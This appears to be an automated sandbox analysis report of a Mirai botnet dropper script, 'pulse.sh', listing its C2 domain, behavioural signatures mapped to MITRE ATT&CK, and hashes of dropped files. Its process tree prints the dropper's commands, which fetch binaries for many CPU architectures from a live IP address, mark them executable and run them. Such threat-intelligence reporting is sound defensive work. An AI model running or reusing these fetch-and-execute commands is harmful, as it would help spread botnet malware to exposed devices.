Analysis
-
max time kernel
22s -
max time network
149s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
17-12-2024 15:07
General
-
Target
pulse.sh
-
Size
2KB
-
MD5
2efc261b46b38b61e04b765788b4520a
-
SHA1
8885f1f0dc54acc0fc18ae569a588aed74f0520f
-
SHA256
c43ed60dcf23bea7081060d912b51686f299f52d27d0ecee5c9206d6c05767a9
-
SHA512
98610b8f3d27b9c97f3f924cf9fd75567f0947b7a93555099299cd7688d75c1a1a6b5c1d201e8082a921be4b81800041b95febf74cc96acc481336d2bb8e21aa
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 2 IoCs
-
Executes dropped EXE 12 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Writes file to system bin folder 4 IoCs
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 12 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 24 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/pulse.sh/tmp/pulse.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.x862⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.mpsl2⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm2⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm52⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm62⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm72⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.ppc2⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.m68k2⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.spc2⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.i6862⤵
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.i6862⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.sh42⤵
-
-
/bin/chmodchmod +x pulse.sh systemd-private-d385adfb7caf4b8691016f7e958d1aa8-systemd-timedated.service-CLQDlH WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH pulse.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arc2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD5f9f659d89827d1a4d0a67c72dd12b40a
SHA13b7c733e830a491b59caccd8095653944cf0ccaa
SHA256740386f0c2bbe65f40edf6bbdd67735b2c2ba6280fc7f5a852b18ddfc5cf3308
SHA512a3c2b5d87d554bce5e949fc3dfdf501c7105e4f1851b5dcd4329d080b26543751452482a3956d1571a21f168a9bd5ef52587e3b6a78dcd4cc543cbefd6bc3f59
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225